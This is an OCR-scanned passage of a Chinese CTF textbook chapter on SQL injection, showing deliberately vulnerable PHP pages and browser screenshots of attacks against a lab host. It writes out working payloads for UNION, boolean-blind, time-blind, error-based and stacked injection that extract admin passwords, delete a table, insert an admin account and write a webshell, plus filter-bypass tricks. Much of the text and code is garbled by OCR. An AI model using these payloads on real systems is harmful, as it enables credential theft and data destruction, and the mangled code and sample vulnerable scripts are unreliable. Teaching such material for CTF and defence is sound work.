© 9 0 0 19216820133sanphorde1 x [人 天 首页 x | 十 
€ 3 C ga 不 安全 | 192.168.20.133/sqll,php?id=1%20union%20select%20user,pwd%20from%20wp_user 妇 十 和 加 名 国 eo: 
党 国 技术 文章 《) GhHub 四 Tuisec 安 全 的 点 。 姑 Google 一 渗 ” 禾 Sec-News 安全 文摘 ”的 着 讯 安全 玄武 实验 -四 /rjnetsec - Inform.。 国 ctf 网 站 


sqli 

it is the beginning 

图 1-2-10 
然而 图 1-2-10 中 并 未 按 预期 显示 用 尸 和 密码 的 内 容 。 事 实 上 ，MySQL 确 实 查 询 出 了 两 行 记录 ， 但 

代码 决定 了 该 页 面 只 显示 一 行 记录 ， 所 以 我 们 需要 将 账号 密码 的 记录 显示 在 查询 结果 的 第 一 行 。 此 

时 有 多 种 办 法 ， 如 可 以 继续 在 原 有 数据 后 面 加 上 “limit 1，1” 参 数 (显示 查询 结果 的 第 2 条 记录 ， 见 
图 1-2-11) 。“limit 1，1” 是 一 个 条 件 限 定 ， 作 用 是 取 查 询 结果 第 1 条 记录 后 的 1 条 记录 。 又 如 ， 指 
定 id=-1 或 者 一 个 很 大 的 值 ， 使 得 图 1-2-9 中 的 第 一 行 记录 无 法 被 查询 到 ( 见 图 1-2-12) ， 这 样 结果 
束 只 有 一 行 记录 了 ( 见 图 1-2-13) 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekd3d322001ad3d9446802347 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 








通常 采用 图 1-2-13 所 示 的 方法 ,访问 http://192.168.20.133/sql1.php? id=-1 union select 
use 
US Er 


ON) 192.16820133/sqilphp7ide-| x 【人 阅读 首页 x | 十 
€ 3 C © 不 安全 | 192.168.20.133/sqll.php?id=-1%20union%20select%20usenpwd%20from%20wpuser 让 二 四 昌国 @  :; 
洪 应 用 国 技术 文章 《)》 GitHub 四 Tuisec 安 全 热点 。 邯 Google 币 译 篇 Sec-News 安全 文摘 人 轴 讯 安全 克基 实验 四 /jnetsec - nform-。 国 cf 网 站 » 


admin 


this_is_the_admin_password 


图 1-2-14 
通常 把 使 用 UNION 语 句 将 数据 展示 到 页 面 上 的 注入 办 法 称 为 UNION (联合 查询 ) 注入 。 


刚才 的 例子 是 因为 我 们 已 经 知道 了 数据 库 结构 ， 那 么 在 测试 情况 下 ， 如 何 知道 数据 表 的 字段 名 pwd 和 
表 名 wp_user 呢 ? 


MySQL 5.0 版 本 后 ， 默 认 目 市 一 个 数据 库 information_schema，MySQL 的 所 有 数据 库 名 、 表 名 、 字 
段 名 都 可 以 从 中 查询 到 。 虽 然 引 入 这 个 库 是 为 了 方便 数据 库 信息 的 查询 ， 但 客观 上 大 大 方便 了 SQL 注 
入 的 利用 。 


下 面 开 始 注入 实战 。 假 设 我 们 不 知道 数据 库 的 相关 信息 ， 移 通过 id=3-1 和 id=2 的 回 显 页 面 一 致 〈 即 
图 1-2- /与 图 1-2-8 的 内 容 一 致 ) 判断 这 里 存在 一 个 数字 型 注入 ， 然 后 通过 联合 得 询 ， 得 到 本 数据 库 的 
其 他 所 有 表 名 。 访 问 http://192.168.20.133/sql1.php? id=-1 union select 1，group concat 
(table name) from information schema.tables where table schema=database()， 结 果 


US 
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wp_files,wp_news,wp_user 
图 1-2-15 
table _ name 字段 是 information schema 库 的 tables 表 的 表 名 字段 。 表 中 还 有 数据 库 名 字段 table_ _，。 。 
。 而 database0 消 数 返 回 的 内 容 是 当前 数据 库 的 名 称 ，group_concat 是 用 “，” 联 合 多 行 记录 
的 函数 。 也 融 是 襄 ， 设 语句 可 以 联合 查询 当前 库 的 所 有 (事实 上 有 一 定 的 长 度 限制 ) 表 名 并 显示 在 一 
个 字段 中 。 而 图 1-2-15 与 图 1-2-16 的 结果 一 致 也 证 明了 该 语句 的 有 效 性 。 这 样 束 可 以 得 到 存在 数据 表 


Wp_user, 





图 1-2-16 


同 理 ， 通 过 columns 表 及 其 中 的 column_name 查 询 出 的 内 容 即 为 wp_user 中 的 字段 名 。 访 问 http:// 
192.168.20.133/sql1.php? id=-1 union select 1，group concat (column name) from 
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_Schema.columns where table name='wp user ， 可 以 得 到 对 应 的 字段 名 ， 见 图 1-2 
-17。 information 


ee D 192168.20133/sqlphp?ids-1 x 加 
€ > C © 不 安全 | 192168.20133/sqllphp?id= -1%20union%20selectX201.9roup_concatlcolumn_name).. 六 时 ODO 
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1 
id,user'pwd 
图 1-2-17 
至 此 ， 第 一 个 例子 结束 。 数 字 型 注入 的 关键 在 于 找到 输入 的 参数 点 ， 然 后 通过 加 、 减 、 科 除 等 运算 ， 
判断 出 输入 参数 附近 没有 引号 包 诸 ， 骨 通过 一 些 通用 的 攻击 手段 ， 获 取 数 据 库 的 敏感 信息 。 


1.2.1.2 字符 型 注入 和 布尔 盲 注 


面 简单 修改 sql1.php 的 源 人 代码， 将 其 改 成 sql2.php， 如 下 所 示 。 


sql2.php 
<?php 
$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 
$res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id = '".$_GET['id']."'"); 
$row = mysqli_fetch_array($res); 
echo "<center>"; 
echo "<hl>".$row['title']."</hl>"; 
echo "<br>"; 
echo "<hl>".$row['content’']."</hl>"; 
echo "</center>"; 


=IS MEIe ello: A de ES TN ya NA ON 
询 : 


结果 见 图 1-2-18。 


图 1-2-18 
在 MySQL 中 ， 边 如 果 类 型 不 一 致 ， 则 会 友 生 强制 转换 。 当 数字 与 字符 串 数 据 比 较 时 ， 字 人 符 串 将 
包 转 损 为 数字 ， 再 进行 比较 ， 见 图 1-2-19。 字 符 串 1 与 数字 相等 ; 字符 串 1a 被 强制 转换 成 1， 与 1 相 
等 ; 字符 串 a 被 强制 转换 成 0 所 以 与 0 相等 。 


图 1-2-19 
按照 这 个 特性 ， 我 们 容易 判断 输入 点 是 否 为 字符 型 ， 也 残 是 是 否 有 3 引号 (可 能 是 单 引 号 也 可 能 是 双 引 
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号 ， 绝 大 多 数 情况 下 是 单 引 号 ) 包 诸 。 


访问 http://192.168.20.133/sql2.php? id=3-2， 结 果 见 图 1-2-20， 页 面 为 空 ， 猜 测 不 是 数字 型 ， 
可 能 是 字符 型 。 继 续 尝 试 访问 http://192.168.20.133/sql2.php? id=2a， 结 果 见 图 1-2-21， 说 明 
是 字符 型 。 


二 局 国门 192168.20.133/sql2.php?id=3 x 十 
€ >》> C © 不 安全 | 192.168.20.133/sql2.php?id=3-1 廊 十 和 加 名 园 辣 
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图 1-2-20 
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have fun baby! 

图 1-2-21 
尝试 使 用 单 引 号 来 闭合 前 面 的 单 引 号 ， 表 用 “--%20” 或 “%23” 注 释 后 面 的 语句 。 注 意 ， 这 里 一 定 
要 URL 编 码 ， 空 格 的 编码 是 “%20”，“#” 的 编码 是 “%23” 。 


访问 http://192.168.20.133/sql2.php? id=2%27%23， 结 果 见 图 1-2-22。 


@9@ [ 19216820133/sql2.php?id=2 x 十 
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图 1-2-22 


成 功 显示 内 容 ， 此 时 的 MySQL 下 句 如 下 : 


输入 的 单 引号 闭合 了 前 面 预 置 的 单 引 号 ,输入 的 “# ”注释 了 后 面 预 置 的 单 引 号 ， 碍 询 语 句 成 功 执 
行 ， 接 下 来 的 操作 束 与 1.2.1.1 节 的 数字 型 注入 一 致 了 ， 结 果 见 图 1-2-23。 


dW 中 19216820133fsq2phptdoz x 二 
” © 不 安全 | 192.168.20.133/sql2 php?7id=2%27union%20selectX201,concat(user,0x7e,pwd)%20from%20wp_user%20RmitX201,1X23 站 过 
游 应 用 ”2 技术 文章 《) GaHub 加 Tusec 安 全 第 点 多 Google 本 齐 国 Sec-News 吻 全 文摘 全 粳 讯 安全 玄关 实 蛤 。  @ Nnetsec -miorm_ 国 cu 站 BD ctf 必 自 。 tools 
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admin~this_is_the_admin_password 
图 1-2-23 
当然 ， 除 了 注释 ， 也 可 以 用 单 引 号 来 闭合 后 面 的 单 引号 ， 见 图 1-2-24。 


S00@ 口 12168.20133/sql2.php?id=1 x 十 
了 @ 不 安全 192.168.20.133/sql2.php?id=1%27%20and%20%271 人 让 从 四 
当 应 用 国 技术 文章 《)] GitHub 四 Tuisec 安 全 热点 ”区 Google 翻译 @ Sec-News 安全 文摘 ”人 腾讯 安全 玄武 实验 ..… 


sqli 


it is the beginning 


图 1-2-24 


访问 http://192.168.20.133/sql2.php? id=1 and'1， 这 时 数据 库 查 询 语句 见 图 1-2-25。 


图 1-2-25 
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天 键 字 WHERE 是 SELECT 操作 的 一 个 判断 条 件 ， 之 前 的 id= 1 即 查 询 条 件 。 这 里 ，AND 代 表 需 要 同时 
满足 两 个 条 件 ， 一 个 是 id=1， 另 一 个 是 '1'。 由 于 字符 串 '1' 被 强制 转换 成 True， 代 表 这 个 条 件 成 立 ， 


因此 数据 库 查 询 出 id= 1 的 记录 。 


再 看 图 1-2-26 所 示 的 语句 : 第 1 个 条 件 仍 为 id=1， 第 2 个 条 件 字 符 串 'a 被 强制 转换 成 逻辑 假 ， 所 以 条 
件 不 满足 ， 碍 询 结果 为 空 。 当 页 面 显 示 为 sqli 时 ，AND 后 面 的 值 为 真 ， 当 页 面 显示 为 空 时 ，AND 后 面 
的 值 为 假 。 虽 然 我 们 看 不 到 直接 的 数据 ， 但 是 可 以 通过 注入 推测 出 数据 ， 这 种 技术 被 称 为 布尔 盲 注 。 


图 1-2-26 
那么 ， 这 种 情况 下 如 何 获得 数据 呢 ” 我 们 可 以 猜测 数据 。 例 如 ， 先 试探 这 个 数据 是 否 为 'a'， 如 果 是 ， 
则 页 面 显示 id= 1 的 回 显 ， 否 则 页 面 显示 空 日 ， 再 试探 这 个 数据 是 否 为 bp ， 如 果 数 据 只 有 1 位 ， 那 么 只 
要 把 可 见 字 符 都 试 一 饥 束 能 猜 到 。 假 设 被 猜测 的 字符 是 f， 访 问 http://192.168.20.133/sql2. 
? id=1'and'f'='a'， 猜 测 为 'a'， 没 有 猜 中 ， 于 是 尝试 'b'、'cC'、'd'、'e'， 都 没有 狂 中 ， 直到 EP 
试 'f 的 时 候 ， 猜 中 了 ， 于 是 页 面 回 显 了 id=1 的 内 容 ， 见 图 1-2-27。 


当然 ， 这 样 依次 猜测 的 速度 太 慢 。 我 们 可 以 换个 符号 ， 使 用 小 于 符号 按 范围 铺 测 。 访 问 链接 httpV/，。， 
.168.20.133/sql2.php? id=T'and'f' <'n'， 这 样 可 以 很 快 知道 被 猜测 的 数据 小 于 字符 'n'， 随 后 


用 二 分 法 继续 猜 出 被 测字 符 。 


上 述 情况 只 是 在 单字 符 条 件 下 ， 但 实际 上 数据 库 中 的 数据 大 多 不 是 一 个 字符 ， 那 么 ， 在 这 种 情况 下 ， 
我 们 如 何 获 取 每 一 位 数据 ? 管 案 是 利用 MySQL 目 市 的 遂 数 进行 数据 截取 ， 如 substring()、mid0、 
S 
0 7 风 图 1 228。 


Ubstr 
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图 1-2-27 


图 1-2-28 
yA 
果 见 图 1-2-29) : 


SELECT concat(user, Qx7e, pwd) FROM wp_user 
然后 截取 数据 的 第 1 位 (结果 见 图 1-2-30) : 
SELECT MID((SELECT concat(user, Ox7Te, pwd) FROM wp_user), 1, 1) 


于 是 完整 的 利用 SQL 语句 如 下 : 


SELECT title, content FROM wp_news WHERE id = '1' AND 
(SELECT MID((SELECT concat(user, Qx7e, pwd) FROM wp_user), 1, 1)) = 'a' 
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图 1-2-29 


图 1-2-30 
访问 链接 http://192.168.20.133/sql2.php? id=1'and (select mid ( (select concat (user， 
0x7e，pwd) from wp user) ，1，1) ) ='a'%23， 结果 见 图 1-2-31。 截 取 第 2 位 ,访问 http:// 
192.168.20.133/sql2.php? id=1'and (select mid ( (select concat (user, Ox7e, pwd) pe 
wp_user) ，2，1) ) ='d'%23， 结 果 与 图 1-2-31 的 一 致 ， 说 明 第 2 位 是 'd'"。 以 此 类 推 ， 即 可 


得 到 相应 的 数据 。 
sqli 


图 1-2-31 

竺 盲 注 过 程 中 ， 根 据 页 面 回 显 的 不同 来 判断 布尔 讶 注 比 较 常 见 ， 除 此 之 外 ， 还 有 一 类 盲 注 方式 。 由 于 
菏 些 情况 下 ， 页 面 回 显 的 内 容 完 全 一 至， 故 需 要 借助 其 他 手段 对 SQL 注 入 的 执行 结果 进行 判断 ， 如 通 
过 服务 器 执行 SQL 语句 所 需要 的 时 间 ， 见 图 1-2-32。 在 执行 的 语句 中 ， 由 于 sleep (1) 的 存在 ,使 整 
个 语句 在 执行 时 需要 等 待 1 秒 ， 导 致 执行 该 查询 需要 至少 1 秒 的 时 | 间 。 通 过 修改 sleep() 遂 数 中 的 参数 ， 
我 们 可 以 延 时 更 长 ， 来 保证 是 注入 导致 的 延 时 ， 而 不 是 业务 正 弟 处 理 导 致 的 延 时 。 与 回 显 的 盲 注 的 直 
观 结果 不 同 ， 通 过 sleep() 函 数 ， 利 用 iF 条件 函数 或 AND、 OR 消 数 的 短路 特性 和 SQL 执 行 的 时 | 司 判断 、 

攻击 的 结果 ， 这 种 注入 的 万 式 被 称 为 时 间 盲 注 。 其 本 质 与 布尔 盲 注 类 似 ， 故 具体 利用 方式 不 再 效 


图 1-2-32 


1.2.1.3 报错 注入 
有 了 时 为 了 方便 开发 者 调试 ， 有 的 网 站 会 开启 错误 调试 信息 ， 部 分 代码 如 sql3.php 所 示 。 


sql3.php 


$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 
s = mysqli_query($conn, "SELECT title, content FROM wp_news 
WHERE id = '".$_GET['id']."'") OR VAR_DUMP(mysqli_error($conn));  // 显示 错误 
= mysqli_fetch_array($res); 
"<center>"; 
0 "<hl>".$row['title’']."</h1l>"; 
<br>"; 


. 
"<h1l>". $row['content']."</h1l>"; 
"</center>"; 


此 时 ， 只 要 触 友 SQL 语 句 的 错误 ， 即 可 在 页 面 上 看 到 错误 信息 ， 见 图 1-2-33。 这 种 攻击 方式 则 是 因为 
MySQL 会 将 语句 执行 后 的 报错 信息 输出 ， 故 称 为 报错 注入 。 


图 1-2-33 
通过 查阅 相关 文档 可 知 ，updatexml 在 执行 时 ， 第 二 个 参数 应 该 为 合法 的 XPATH 路 径 ， 否 则 会 在 引 友 
报错 的 同时 将 传 入 的 参数 进行 输出 ， 如 图 1-2-34 所 示 。 
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图 1-2-34 
利用 这 个 特征 ， 针 对 仓 在 报错 显示 的 例子 ， 将 我 们 想得到 的 信息 传 入 updatexml 函 数 的 第 二 个 参数 ， 
在 浏览 器 中 尝试 访问 链接 http://192.168.20.133/sql3.php? id=1'or updatexml (1，concat 
(0x7e， (select pwd from wp user) ) ，1) %23， 结 果 见 图 1-2-35。 


图 1-2-35 


另外 ， 当 目标 开局 多 语句 执行 的 时 候 ， 可 以 采用 多 语句 执行 的 方式 修改 数据 库 的 任意 结构 和 数据 ， 这 
种 特殊 的 注入 情况 被 称 为 堆 蔷 注入。 


部 分 源 代 码 如 sql4.php 所 示 。 


sql4.php 
<?php 

$db = new PDO("mysql:host=localhost:3306;dbname=test", 'root', 'root'); 
$sql = "SELECT title, content FROM wp_news WHERE id="'".$_GET['id']."'"; 
EG 4 

foreach($db->query($sql) as $row) { 

print_r($row); 

上 
} 
catch(PDOException $e) { 

echo $e->getMessage(); 

disl): 


此 时 可 在 闭合 单 引号 后 执行 任意 SQL 语 句 ， 如 在 浏 响 器 中 尝试 访问 http://192.168.20.133/sql4. 


h 
? id=1%27; delete%20%20from%20wp files; %23， 结 果 见 图 1-2-36， Ts 
中 的 所 有 数据 。 


全 大 二 @ 192168.20133/sql4php?idwi x 十 


图 1-2-36 
本 节 讲 述 了 数字 型 注入 、UNION 注 入 、 布 尔 盲 注 、 时 间 讶 注 、 报 错 注 入 ， 这 些 是 在 后 续 注入 中 需要 
用 到 的 基础 。 根 据 获 取 数 据 的 便利 性 ， 这 些 注入 技巧 的 使 用 优先 级 是 : UNION 注 入 > 报错 注入 > 布尔 
盲 注 > 时 间 盲 注 。 


扒 赤 注入 不 在 排序 泡 围 内 ， 因 为 其 通 弟 需 要 结合 其 他 技巧 使 用 才能 获取 数据 。 


WN 
本 节 将 从 SQL 语句 的 语法 角度 ， 从 不 同 的 注入 点 位 置 讲述 SQL 注入 的 技巧 。 


1.2.2.1 SELECT 注入 


SELECT 语 句 用 于 数据 表 记 录 的 查询 ， 常 在 界面 展示 的 过 程 使 用 ， 如 新 闻 的 内 容 、 界 面 的 展示 等。 a 
语句 的 语法 如 下 : 


SELECT 
[ALL | DISTINCT | DISTINCTROW ] 
[HIGH_PRIORITY] 
[STRAIGHT_JOIN] 


Fan [ol railt i Foams mY mr 3 Foam Pie rmi 
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LSQL_SmRALL_KESULIJ LSQWL_GIG_KESULIJ LSWL_BUFFER_RESULIJ 
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] 
select_expr[, select_expr …] 
[FROM table_references 
[PARTITION partition_list] 
[WHERE where_condition] 
[GROUP BY {col_name | expr | position} 
[ASC | DESC], : [WITH ROLLUP]] 
[HAVING where_condition] 
[ORDER BY {col_name | expr | position} 
[ASC | DESC], …] 
[LIMIT {[offset,] row_count | row_count OFFSET offset}] 
[PROCEDURE procedure_name(argument_list)] 
[INTO OUTFILE 'fiLe_name' 
[CHARACTER SET charset_name] 
export_options | INTO DUMPFILE 'fiLe_name' | INTO var_name [, var_name]] 
[FOR UPDATE | LOCK IN SHARE MODE]] 


1. 注入 点 在 select expr 


源 代码 如 sqln1.php 所 示 。 


sqln1.php 
<?php 
$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 
$res = mysqli_query($conn, "SELECT ${_GET['id']}, content ROM wp_news"); 
$row = mysqli_fetch_array($res); 
echo "<center>"; 
echo "<hl>".$row['title’']."</h1l>"; 
echo "<br>"; 
echo "<hl>".$row['content']."</hl>"; 
echo "</center>"; 


此 时 可 以 采取 1.2.1.2 忆 中 的 时 间 盲 注 进行 数据 获取 ， 不 过 根据 MySQL 的 语法 ， 我 们 有 更 优 的 方法 ， 
即 利 用 As 别名 的 方法 ， 直 接 将 得 询 的 结果 显示 到 界面 中 。 访 问 链接 http://192.168.20.133/sqln1. 
2 id= (select%20pwd9%20from2%20wp user) %20as%z2otitle， 见 图 1-2-37。 i 


@ 不 安全 | 192.168.20.133/sqln1.php?id=(select%20pwd%20from%20wp_user)%20as%20title 广 
技术 文章 《)] GitHub ”四 Tuisec 安 全 热点 ” 莉 Google 翻译 ” 偏 Sec-News 安全 文摘 ”人 腾讯 安全 玄武 实验 ..。 @ /netsec - Inform..， 让 


this_is_the_admin_password 


it is the beginning 
图 1-2-37 


. 注入 点 在 table _ reference 


上 文中 的 SQL 查 询 语 句 改 为 如 下 : 


$res = mysqli_query($conn, "SELECT title FROM ${_GET['table']}"); 


我 们 仍 可 以 用 别名 的 方式 直接 取出 数据 ， 如 


当然 ， 在 不 知 表 名 的 情况 下 ， 可 以 先 从 information_schema.tables 中 查询 表 名 。 


在 select_expr 和 table_reference 的 注入 ， 如 果 注 入 的 点 有 反 引 号 包 庄 ， 那 么 需要 先 闭 合 反 引号 。 读 
者 可 以 在 自己 本 地 测试 具体 语句 。 


3. 注入 点 在 WHERE 或 HAVING 后 


SQL 查 询 语句 如 下 : 


$res = mysqli_query($conn, "SELECT title FROM wp_news WHERE id = ${_GET[id]}"); 
这 种 情况 已 经 在 1.2.1 节 的 注入 基础 中 讲 过 ， 也 是 现实 中 最 弟 遇 到 的 情况 ， 要 先 判断 有 无 引号 包 于 ,再 
闭合 前 面 可 能 存在 的 括号 ， 即 可 进行 注入 来 获取 数据 。 


DN MN a 


4. 注入 点 在 GROUP BY 或 ORDER BY 后 
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当 遇 到 不 是 WHERE 后 的 注入 点 时 ， 先 在 本 地 的 MySQL 中 进行 尝试 ， 看 语句 后 面 能 加 什么 ， 从 而 判断 
当前 可 以 注入 的 位 置 ， 进 而 进行 针对 性 的 注入 。 假 设 代码 如 下 : 
经 过 测试 可 以 友 现 ，title=id desc， (if (1，sleep (1) ，1) ) 会 让 页 面 迟 1 秒 ， 于 是 可 以 利用 时 
间 注 入 获取 相关 数据 。 


本 节 的 情况 在 大 部 分 开 友 者 有 了 安全 意识 后 仍 广泛 存在 ， 主 要 原因 是 开 友 者 在 编写 系统 框 染 时 无 法 使 
用 预 编译 的 办 法 处 理 这 类 参数 。 事 实 上 ， 只 要 对 输入 的 值 进行 日 名 单 比 对 ， 基 本 上 歹 能 防御 这 种 注 
人 


5. 注入 点 在 LIMIT 后 


LIMIT 后 的 注入 判断 比较 简单 ， 通 过 更 改 数字 大 小 ， 页 面 会 显示 更 多 或 者 更 少 的 记录 数 。 由 于 语法 限 
制 ， 前 面 的 字符 注入 方式 不 可 行 (LIMIT 后 只 能 是 数字 ) ， 在 整个 SQL 语 句 没 有 ORDER BY 关键 字 的 
情况 下 ， 可 以 直接 使 用 UNION 注 入 。 另 外 ， 我 们 可 根据 SELECT 语法 ， 通 过 加 入 PROCEDURE 来 尝试 
注入 ， 这 类 语句 只 适合 MySQL 5.6 前 的 版 本 ， 见 图 1-2-38。 

图 1-2-38 
同样 可 以 基于 时 间 注 入 ， 语 名 如 下 : 


PROCEDURE anaLyse((SELECT extractvalue(1, concat(Qx3a, (IF(MID(VERSION(), 1, 1) LIKE 5, 
BENCHMARK(50600000, SHA1(1)), 1))))), 1) 


BENCHMARK 语 句 的 处 理 时 间 大 约 是 1 秒 。 在 有 写 入 权限 的 特定 情况 条 件 下 ， 我 们 也 可 以 使 用 INTO 
OUTFILE 语 句 向 Web 目 录 写 入 webshell， 在 无 法 控制 文件 内 容 的 情况 下 ， 可 通过 “SELECT xx INTO 
outfile"/tmp/xxx.php"LINES TERMINATED BY'<? php phpinfo(); ? >” 的 方式 控制 部 分 内 
容 ， 见 图 1-2-39。 


图 1-2-39 


1.2.2.2 INSERT 注 入 


INSERT 语 句 是 插入 数据 表 记 录 的 语句 ， 网 页 设计 中 常 在 添加 新 闻 、 用 户 注 册 、 回 复评 论 的 地 方 出 
现 。INSERT 的 语法 如 下 : 


INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE] 
[INTO] tbl_name 
[PARTITION (partition_name [, partition_name] …]] 
[Ccol_name [, col_name] …)] 
{VALUES | VALUE} (value_list) [, (value_list)] … 
[ON DUPLICATE KEY UPDATE assignment_List] 

INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE] 
[INTO] tbL_name 
[PARTITION (partition_name [, partition_name] :…)] 
SET assignment_list 
[ON DUPLICATE KEY UPDATE assignment_list]= 

INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE] 
[INTO] tbL_name 
[PARTITION (partition_name [, partition_name] :…)] 
[Ccol_name [, col_name] …)] 
SELECT … 
[ON DUPLICATE KEY UPDATE assignment_List] 
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通常 ， 注 入 位 于 字段 名 或 者 字段 值 的 地 方 ， 且 没有 回 显 信 息 。 
1. 注入 点 位 于 tbl name 


如 果 能 够 通过 注释 符 注 释 后 续 语句 ， 则 可 直接 插入 特定 数据 到 想 要 的 表 内 ， 如 管理 员 表 。 例 如 ， 对 于 
如 下 SQL 语句 : 


$res = mysqli_query($conn, "INSERT INTO {$_GET['table']} VALUES(2,2,2,2)"); 
开发 者 预想 的 是 ， 控 制 table 的 值 为 wp_news， 从 而 插入 新 闻 表 数据 。 由 于 可 以 控制 表 名 ， 我 们 可 以 
访问 http://192.168.20.132/insert.php? table=wp user values (2, 'newadmin', 


MAME EN 


0) %23， 访 问 前 、 后 的 wp_user 表 内 容 见 图 1-2-40。 可 以 看 到 ， 已 经 成 功 地 插入 了 一 个 新 的 管 


oo 











图 1-2-40 
PA 


假设 语句 如 下 : 

此 时 可 先 闭 合 单 引 号 ， 然 后 另行 插入 一 条 记录 ， 通 弟 管 理 员 和 普通 用 户 在 同一 个 表 ， 此 时 便 可 以 通过 
表 字 段 来 控制 党 理 员 权限 。 注 入 语句 如 下 : 

如 果 用 户 表 的 第 2 个 字段 代表 的 是 管理 员 权限 标识 ， 便 能 插入 一 个 管理 员 用 户 。 在 某 举 情况 下 ， 我 们 
也 可 以 将 数据 插入 能 回 显 的 字段 ， 来 快速 获取 数据 。 假 设 最 后 一 个 字段 的 数据 会 被 显示 到 页 面 上 ， 那 
么 采用 如 下 语句 注入 ， 即 可 将 第 一 个 用 户 的 密码 显示 出 来 : 


INSERT INTO wp_user VALUES(1, 1, '1'), (2, 2, (SELECT pwd FROM wp_user LIMIT 1)); 


1.2.2.3 UPDATE 注 入 


UPDATE 语 句 适 用 于 数据 库 记 录 的 更 新 ， 如 用 户 修 改 自 己 的 文章 、 介 绍 
a J 


UPDATE [LOW_PRIORITY] [IGNORE] tabLe_reference 
SET assignment_List 
[WHERE where_condition] 
[ORDER BY …] 
[LIMIT row_count] 
value: 
{expr | DEFAULT} 
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assignment : 


col_name = value 
assignment_List: 


assignment [, assignment] … 


例如 ， 以 注入 点 位 于 SET 后 为 例 。 一 个 正常 的 update 语 句 如 图 1-2-41， 可 以 看 到 ， 原 先 表 wp_user 第 
2 行 的 id 数据 人 航 修改 。 


图 1-2-41 
当 id 数 据 可 控 时 ， 则 可 修改 多 个 字段 数据 ， 形 如 


UPDATE wp_user SET id=3, user='xxx' WHERE user = '23'; 


其 余 位 置 的 注入 点 利用 方式 与 SELECT 注 入 类 似 ， 这 里 不 表 蒙 述 。 


1.2.2.4 DELETE 注 入 
DELETE 注 入 大 多 在 WHERE 后 。 假 设 SQL 语 句 如 下 : 


$res = mysqli_query($conn, "DELETE FROM wp_news WHERE id = {$_GET['id']}"); 
DELETE 语 句 的 作用 是 删除 某 个 表 的 全 部 或 指定 行 的 数据 。 对 id 参 数 进 行 注入 时 ， 稍 有 个 剧 就 会 使 
后 的 值 为 True， 导 致 整个 vp_news 的 数据 被 删除 ， 见 图 1-2-42。 


HERE 





图 1-2-42 


为 了 保证 不 会 对 正常 数据 造成 干扰 ， 通 党 使 用 'and sleep (1) 的 方式 保证 WHERE 后 的 结果 返回 为 
alse 
， 让 语句 无 法 成 功 执行 ， 见 图 1-2-43。 后 续 步 骤 与 1.2.1.2 节 的 时 间 盲 注 的 一 致 ， 这 里 不 再 警 述 。 
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图 1-2-43 


1.2.3 注入 和 防御 


本 节 将 讲述 常用 的 防御 手段 和 绕 过 注入 的 若干 万 法 ， 重 点 为 读者 提供 绕 过 的 思路 ， 而 不 是 作为 注入 宇 
典 的 参考 。 


1.2.3.1 字符 蔡 换 


为 了 防御 SQL 注入 ， 有 的 开发 者 直接 简单 、 暴 力 地 将 诸如 SELECT、 FROM 的 关键 字 蔡 换 或 者 匹配 拦 
截 。 


1. 只 过 滤 了 空格 


除了 空格 ， 在 代码 中 可 以 代 蔡 的 空白 符 还 有 %0a、%0b、%0c、%0d、%09、%a0 ( 均 为 URL 编 码 ， 
%a0 在 特定 字符 集 才能 利用 ) 和 /**/ 组 合 、 括 号 等 。 假 设 PHP 源 码 如 下 : 


<?php 
$conn = mysqli_connect("127.0.0.1", "root", "root", "test"); 
$id = 4_GET['id']; 
echo "before replace id: $id"; 
$id = str_replace(" ", "", $sql); // 将 空格 蔡 换 为 空 
echo "after repLace id: $id"; 
$sql = "SELECT title, content FROM wp_news WHERE id=".$id; 
$res = mysqli_query($conn, $sql); 
$row = mysqli_fetch_array($res); 
echo "<center>"; 
echo "<hl>".$row['title']."</h1l>"; 
echo "<br>"; 
echo "<hl>".$row['content']."</h1l>"; 


echo "</center>"; 


使 用 之 前 的 payload ( 见 图 1-2-44) ， 由 于 空格 被 替换 为 空 ， 因 此 SQL 语 句 查 询 出 错 ， 页 面 中 没有 显 
示 title 内 容 。 将 空格 替换 为 “%09”， 效 果 见 图 1-2-45。 


@ 192.168.20.132/replace.php?id X 


司 技术 文章 ) GitHub 


before replace id: -1 union select 1,2 
after replace id: -1unionselect1,2 


图 1-2-44 


| 192.168.20.132/replace.php?id=-1%09union%09select%09... 六 
GitHub ” @ Tuisec 安 全 热点 ”了 蕊 Google 翻译 ” 狼 Sec-News 安全 文摘 @ 邻 


before replace id: -1 union select 1,2 
after replace id: -1 union select 1,2 


1 
图 1-2-425 


2. 将 SELECT 蔡 换 成 空 
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遇 到 将 SELECT 蔡 换 为 空 的 情况 ， 可 以 用 认 套 的 方式 ， 如 SESELECTLECT 形 式 ， 在 经 过 过 滤 后 又 变 回 了 
SELECT。 将 上 面 代码 中 的 语句 


SN 
替换 为 
$id = str_replace("SELECT", "", $sql); 


访问 http://192.168.20.132/replace.php? id=-1%09union%09selselectect%091，2， 结 果 
见 图 1-2-46。 


| 192.168.20.132/replace.php?id=-1%09union%09selselectect%091,2 六 


GitHub ”是 Tuisec 安 全 热点 “” 库 Google 翻译 和合 Sec-News 安全 文摘 ”6@ 腾讯 安全 玄 


before replace id: -1 union selselectect 1,2 
after replace id: -1 union select 1,2 


1 


图 1-2-46 
3. 大 小 写 匹 配 


在 MySQL 中 ， 天 键 字 是 不 区 分 大 小 写 的 ， 如 果 只 匹配 了 "SELECT"， 便 能 用 大 小 写 渴 写 的 方式 轻易 绕 
过 ， 如 "sEleCT"。 


4. 正则 匹配 


正则 匹配 关键 字 "\bselect\b "可 以 用 形 如 "/*! 50000select*/ "的 方式 绕 过 ， 见 图 1-2-47。 


图 1-2-47 


5. 痊 换 了 单 引号 或 双 引 号 ， 志 记 了 反 和 斜 杠 


= EE DE 
$sql ="SELECT * FROM wp_news WHERE id = “可 控 1' AND title = ' 可 控 2'" 
可 构造 如 下 语句 进行 绕 过 


$sql ="SELECT * FROM wp_news WHERE id = 'a\' AND title = 'OR sleep(1)#'" 


